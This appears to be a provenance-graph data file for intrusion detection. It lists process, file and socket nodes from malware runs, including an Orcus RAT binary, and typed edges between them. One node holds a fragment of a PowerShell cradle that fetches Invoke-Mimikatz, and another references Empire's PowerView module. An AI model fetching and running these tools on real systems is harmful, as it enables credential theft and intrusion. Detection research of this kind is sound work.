19
MP*-IEmode.exe 
MP-WinSat.exe
MP-rPedidodeOfertadePre__o_USP2307-17BR___pdf.exe 
MF-\Users\admin\AppData\Local\Temp\CareUEyes_setup.exe
MP-yonr.exe 
MF-C:\Program Files\Orcus\Orcus.exe
MP*-863e7c22c771e4005197ae28363584f8.exe 
MF-ZOR-3261778.pdf
SF-C:\Program Files\Google\Chrome\Application\chrome
TP*-PDQDeployConsole.exe
MP-k2141323.exe
TF-atomic.exe
TP*-WINWORD.EXE
SO-https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object
MF-Files\OneDrive.exe
SO-https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1
TF-C:\Users\admin\AppData\Local\Temp\VUIlNoZNzEFwsrIkpa\EvaPKO
SF-C:\Windows\System32\msiexec.exe
MP-WinSat.exe
41
0 1 FR-1
0 2 FR-1
1 2 UK-1
0 3 WR-1
0 4 FR-1
4 3 WR-1
0 5 WR-1
4 5 UK-1
0 6 FR-1
6 3 RD-2
0 7 WR-1
6 7 WR-2
0 8 WR-1
6 8 WR-2
0 9 IJ-1
9 3 WR-3
6 9 IJ-2
9 7 CD-3
9 8 WR-3
0 10 FR-1
10 3 WR-3
10 7 WR-3
10 8 WR-3
9 10 IJ-3
6 11 WR-2
9 11 UK-3
12 3 WR-4
12 7 EX-4
12 8 EX-4
10 12 IJ-3
13 10 RF-3
13 12 RF-4
10 14 RD-3
12 14 RD-4
15 10 RF-3
15 12 RF-4
10 16 WR-3
12 16 RD-4
10 17 RD-3
12 17 UK-4
10 18 UK-3

